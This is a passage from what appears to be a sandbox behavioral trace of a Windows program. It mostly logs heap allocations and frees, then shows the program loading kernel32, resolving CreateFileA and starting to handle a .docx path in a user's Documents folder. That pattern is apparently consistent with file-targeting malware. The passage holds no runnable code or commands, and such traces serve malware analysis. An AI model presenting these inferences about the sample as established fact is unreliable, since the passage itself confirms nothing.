dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.769] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.769] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.769] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.769] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.770] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.773] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.775] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889988 [0035.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889988, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.776] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0035.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.776] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0035.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61) returned 0x7c10a8 [0035.777] WideCharToMultiByte (in: 